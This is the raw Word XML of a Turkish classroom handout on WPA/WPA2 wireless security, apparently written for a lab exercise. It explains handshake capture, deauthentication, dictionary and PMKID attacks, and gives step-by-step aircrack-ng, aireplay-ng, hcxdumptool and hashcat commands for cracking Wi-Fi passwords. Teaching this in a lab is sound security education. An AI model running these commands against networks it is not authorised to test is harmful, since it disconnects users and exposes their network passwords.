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8614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🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. WPA/WPA2 Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548A693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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WPA (Wi-Fi Protected Access)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:t xml:space="preserve"> ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WPA2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:t>, kablosuz ağlarda veri güvenliği sağlamak için kullanılan şifreleme protokolleridir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B322A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WPA2, WPA'nın daha güçlü bir sürümüdür ve genellikle </w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:t xml:space="preserve"> (Advanced Encryption Standard) kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27304A27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Amaç: Kablosuz ağ üzerinden yapılan iletişimi </w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>şifreleyerek</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:t xml:space="preserve"> dış müdahalelere karşı korumak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02998C4B" w14:textId="77777777" w:rsidR="00E840E3" w:rsidRPr="00E840E3" w:rsidRDefault="00000000" w:rsidP="00E840E3">
      <w:r>
        <w:pict w14:anchorId="663B7625">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A7CFB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⚔️</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. WPA/WPA2’ye Yönelik Saldırı Türleri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8A1B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a) Handshake Yakalama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C081C2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Kablosuz cihaz, modeme bağlanırken bir "handshake" (tokalaşma) süreci gerçekleşir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143EC3A0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Bu handshake dosyası, parola kırma saldırıları için yakalanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E383ED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b) Dictionary Attack / Wordlist Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148FAC9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Elde edilen handshake dosyası, sözlükteki şifrelerle eşleştirilerek çözülmeye çalışılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C9A2C7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Eğer şifre zayıfsa, kırılma ihtimali yüksektir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7650C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c) Deauthentication (Bağlantı Kesme) Saldırısı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05F41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Hedef cihaz, ağdan zorla çıkarılır. Yeniden bağlanmaya çalışırken handshake alınır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4272756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Bu saldırı, aireplay-ng aracıyla yapılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F59E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d) PMKID Saldırısı (Modern WPA2 Yöntemi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F87FBB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Cihaz bağlanmadan önce bile şifre çözümüne olanak sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F490518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Özellikle bazı router modellerinde etkili olur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F555399" w14:textId="77777777" w:rsidR="00E840E3" w:rsidRPr="00E840E3" w:rsidRDefault="00000000" w:rsidP="00E840E3">
      <w:r>
        <w:pict w14:anchorId="12305D35">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5774BAF2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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Kullanılabilecek Araçlar (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3434AFC1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airmon-ng → Kablosuz kartı monitor moduna almak için</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644750C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airodump-ng → Erişim noktalarını ve cihazları izlemek için</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3086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aireplay-ng → Deauthentication saldırısı için</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C96725E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lastRenderedPageBreak/>
        <w:t>aircrack-ng → Handshake dosyasını kırmak için</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE7243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hcxdumptool ve hashcat → PMKID saldırıları için</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0174C1" w14:textId="77777777" w:rsidR="000E4446" w:rsidRDefault="000E4446"/>
    <w:p w14:paraId="52A0CEDC" w14:textId="11328F5C" w:rsidR="00E840E3" w:rsidRDefault="00E840E3">
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Kurulum (Kali’de genelde önceden yüklüdür)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012B5D3" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r>
        <w:t xml:space="preserve">sudo apt-get update  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D633CC" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r>
        <w:t xml:space="preserve">sudo apt-get install aircrack-ng  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25785002" w14:textId="2C8DF247" w:rsidR="00E840E3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r>
        <w:t>sudo apt-get install hcxtools hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663EF487" w14:textId="77777777" w:rsidR="00E840E3" w:rsidRDefault="00E840E3"/>
    <w:p w14:paraId="0BE9B49C" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Adım Adım WPA2 Saldırısı (Handshake Yakalama + Şifre Kırma)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC287A9" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:pict w14:anchorId="3C1F82D6">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB20B6" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a) Kablosuz kartı monitor moduna al:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503DD51A" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:t>airmon-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2531D1" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:pict w14:anchorId="1FEB2775">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F503EF" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>b) Ortamı taramak için:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6245F11A" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:t>airodump-ng wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F68E9" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:t>Burada hedef ağın BSSID’si ve kanal (CH) numarası alınır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA86CCB" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:pict w14:anchorId="1B557392">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5762596C" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c) Hedefi izlemeye başla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3106EB" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:t>airodump-ng --bssid [Hedef_BSSID] -c [Kanal] -w handshake wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3663F" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:pict w14:anchorId="383F6721">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD668EA" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d) Cihazı ağdan at (deauth saldırısı):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5FF307" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:t>aireplay-ng --deauth 10 -a [BSSID] wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FB4C40" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:pict w14:anchorId="73643494">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A92512" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e) Handshake dosyasını crack et:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0DB5EF" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:t>aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1509758F" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:pict w14:anchorId="6641F891">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EF995C" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✴️</w:t>
      </w:r>
      <w:r w:rsidRPr="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. PMKID Saldırısı (Alternatif ve Hızlı Yöntem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85A732" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:t>hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6BF909" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:lastRenderedPageBreak/>
        <w:t>hcxpcapngtool -o pmkid_hash.txt pmkid.pcapng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3DC03C" w14:textId="77777777" w:rsidR="00475ED3" w:rsidRPr="00475ED3" w:rsidRDefault="00475ED3" w:rsidP="00475ED3">
      <w:r w:rsidRPr="00475ED3">
        <w:t>hashcat -m 16800 -a 0 pmkid_hash.txt wordlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC4FBE0" w14:textId="3833CAFF" w:rsidR="00E840E3" w:rsidRDefault="00E840E3"/>
    <w:p w14:paraId="3663107A" w14:textId="04AD119C" w:rsidR="007F057C" w:rsidRDefault="007F057C">
      <w:r w:rsidRPr="007F057C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E894A96" wp14:editId="4CB48549">
            <wp:extent cx="5760720" cy="3235960"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="2041256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6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F1F" w14:textId="77777777" w:rsidR="007F057C" w:rsidRDefault="007F057C"/>
    <w:p w14:paraId="63433567" w14:textId="77777777" w:rsidR="007F057C" w:rsidRDefault="007F057C"/>
    <w:p w14:paraId="09D75F8D" w14:textId="2BDAF851" w:rsidR="007F057C" w:rsidRDefault="007F057C">
      <w:r>
        <w:t xml:space="preserve">Örnekteki gibi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1928F410" w14:textId="77777777" w:rsidR="007F057C" w:rsidRDefault="007F057C"/>
    <w:p w14:paraId="3C752047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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 7. Uygulama Senaryosu (Sınıf Ortamı İçin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74640607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Deneysel WPA2 ağı kurulur (basit parola ile).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C482A4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 yukarıdaki adımları uygulayarak handshake dosyası elde eder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A1F96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aircrack-ng veya hashcat ile parola çözüm süreci başlatılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EA8FC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Öğrencilere güçlü ve zayıf şifreler arasındaki farklar açıklanır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA36F97" w14:textId="77777777" w:rsidR="00E840E3" w:rsidRDefault="00E840E3"/>
    <w:p w14:paraId="606FB585" w14:textId="77777777" w:rsidR="00E840E3" w:rsidRDefault="00E840E3"/>
    <w:p w14:paraId="6535C665" w14:textId="422A66EA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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00475ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00E840E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Sonuç</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0900A2" w14:textId="77777777" w:rsidR="00E840E3" w:rsidRPr="00E840E3" w:rsidRDefault="00E840E3" w:rsidP="00E840E3">
      <w:r w:rsidRPr="00E840E3">
        <w:t>Bu eğitimle öğrenciler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A2EEE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Kablosuz ağ güvenliği temelini öğrenir,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B971F67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lastRenderedPageBreak/>
        <w:t>Handshake nedir, nasıl elde edilir kavrar,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9C7C13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Zayıf şifrelerin ne kadar riskli olduğunu fark eder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150AD96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WPA2 şifreleme ve saldırı yöntemlerine karşı savunma yollarını öğrenir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DED6BE" w14:textId="77777777" w:rsidR="00E840E3" w:rsidRDefault="00E840E3"/>
    <w:sectPr w:rsidR="00E840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04C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F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6CC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98BA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DFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72F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5965"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="829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4D15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5A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3FEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A42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7AE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF5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453A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="742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43490">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1079867594">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1374571874">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1522426587">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="357197688">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1774396468">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2121954144">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1459836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46"/>
    <w:rsid w:val="000E4446"/>
    <w:rsid w:val="00252F82"/>
    <w:rsid w:val="003419C2"/>
    <w:rsid w:val="00475ED3"/>
    <w:rsid w:val="00703BA6"/>
    <w:rsid w:val="007F057C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AB12"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{302B6962-F6AB-4581-95FF-B9A1CDC7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4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4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4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4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4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4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4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4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4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4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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-22T12:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-28T13:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>